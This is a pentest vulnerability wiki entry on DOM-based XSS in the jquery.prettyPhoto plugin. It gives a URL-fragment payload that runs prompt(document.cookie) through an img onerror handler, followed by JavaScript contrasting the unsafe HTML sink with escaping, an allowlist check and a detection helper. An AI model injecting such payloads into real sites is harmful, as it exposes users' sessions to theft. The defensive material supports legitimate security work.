Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

DOM-Based XSS

POC

jquery.prettyPhoto.js is used in this PoC since it is vulnerable to DOM XSS. Add the following payload to the vulnerable URL:

prettyPhoto%3Cimg%20src=x%20onerror=prompt(document.cookie)%3E;//
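The following is an added example, not code from the Cobalt wiki or from the prettyPhoto project. It models the DOM XSS pattern the PoC relies on (a script reads `location.hash` and writes it into the page through an HTML sink) beside the hardened form, plus an allowlist check and a detection helper. The fragment format accepted by `isAllowedHash` is an assumption for illustration, not prettyPhoto's actual hash grammar, and `SAMPLE_HASH` is the PoC payload as a browser would hand it to a script after URL-decoding.

```javascript
// Added example (not from the Cobalt wiki nor from the prettyPhoto project):
// a minimal model of the DOM XSS pattern behind the PoC above, next to its fix.
// A gallery script reads location.hash and writes it into the page; whether
// that write is an HTML sink or a text sink decides whether the payload
// `prettyPhoto<img src=x onerror=...>;//` executes or is merely displayed.

// Constructed sample: the fragment from the PoC after the browser has
// URL-decoded it (the form a script receives from location.hash).
const SAMPLE_HASH = '#prettyPhoto<img src=x onerror=prompt(document.cookie)>;//';

// Vulnerable pattern: the fragment is concatenated into markup destined for an
// HTML sink (innerHTML, jQuery .html(), document.write). A browser parses the
// <img> element and fires its onerror handler.
function renderHashUnsafe(hash) {
  const value = hash.replace(/^#/, '');
  return '<div class="caption">' + value + '</div>';
}

// Encode the characters that can change HTML context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, ch => map[ch]);
}

// Hardened pattern: encode before the value reaches an HTML sink. In a real
// page, assigning to element.textContent instead of innerHTML gives the same
// result without building markup at all.
function renderHashSafe(hash) {
  const value = hash.replace(/^#/, '');
  return '<div class="caption">' + escapeHtml(value) + '</div>';
}

// Input validation: hypothetical allowlist describing what a gallery fragment
// is expected to contain (assumed format, not prettyPhoto's actual grammar).
// Anything outside the allowlist is rejected before it is used at all.
function isAllowedHash(hash) {
  return /^#[\w\[\]\/!-]*$/.test(hash);
}

// Detection helper for log review or request inspection: flags fragments that
// carry tag delimiters, whether raw or percent-encoded.
function hashContainsMarkup(rawHash) {
  let decoded = rawHash;
  try {
    decoded = decodeURIComponent(rawHash);
  } catch (e) {
    // malformed %-escape: inspect the raw value instead
  }
  return /[<>]/.test(decoded);
}

// Stand-alone demonstration of the difference between the two sinks.
console.log('unsafe :', renderHashUnsafe(SAMPLE_HASH));
console.log('safe   :', renderHashSafe(SAMPLE_HASH));
console.log('allowed:', isAllowedHash(SAMPLE_HASH));
```

The fix is two-layered: reject fragments that do not match the expected shape, and never let the remaining value reach an HTML sink without encoding (or use a text sink such as `textContent`). The detection helper is useful when reviewing access logs for the encoded form of the payload shown above.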

Impact

Medium

Likelihood

Medium